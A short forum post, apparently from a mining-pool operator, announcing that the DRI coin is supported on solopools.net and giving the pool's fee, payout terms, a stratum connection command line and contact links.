Added to https://solopools.net (PROP) - USA East - 0.25% PROP - Payments every hour, with 0.0001 minimum.

Shared:
Code:
Solopools.net: -a sha256 -o stratum+tcp://pool.solopools.net:3343 -u <WALLET_ADDRESS> -p c=DRI

Discord: https://discord.gg/2Y6CBXXnQp | E-mail: solopoolsnet .at. gmail . com | Twitter: https://twitter.com/SoloPools | Reddit: https://www.reddit.com/r/solopools
Pages: [1] 2 3 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!